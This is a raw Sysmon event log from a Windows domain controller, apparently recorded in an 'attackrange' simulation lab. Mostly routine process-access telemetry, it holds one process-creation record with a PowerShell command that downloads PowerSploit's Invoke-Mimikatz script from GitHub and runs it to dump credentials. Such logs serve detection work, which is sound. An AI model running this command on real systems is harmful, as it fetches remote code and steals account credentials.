22:53:20.379{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.379{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.379{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7060-603D-4C88-00000000AD01}8236C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.379{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7060-603D-4C88-00000000AD01}8236C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+7075331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64) 154100x80000000000000001695394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.380{05ADC7E1-7060-603D-4C88-00000000AD01}8236C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001695393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D582669C4C11A6661B9CE3B42D09345,SHA256=46190E6C1BE88982DB834A6B00214AE12908DA65393043998EAED6DE34F820CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.962{05ADC7E1-7061-603D-5188-00000000AD01}7228ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.768{05ADC7E1-229F-6039-1400-00000000AD01}13168080C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.654{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.654{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.608{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.607{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:21.585{05ADC7E1-7061-603D-5188-00000000AD01}7228\PSHost.132591128014955746.7228.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.572{05ADC7E1-7061-603D-5188-00000000AD01}7228ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_bisrbeec.wor.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.571{05ADC7E1-7061-603D-5188-00000000AD01}7228ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_sqhr3nsd.4lx.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.556{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_sqhr3nsd.4lx.ps12021-03-01 22:53:21.556 10341000x80000000000000001695463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.537{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.499{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.496{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.496{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.496{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.496{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.496{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.495{05ADC7E1-7061-603D-5088-00000000AD01}68965092C:\Windows\system32\cmd.exe{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.495{05ADC7E1-7061-603D-5188-00000000AD01}7228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7061-603D-5088-00000000AD01}6896C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" 10341000x80000000000000001695454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.492{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7061-603D-5088-00000000AD01}6896C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.491{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7061-603D-5088-00000000AD01}6896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.486{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:21.486{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 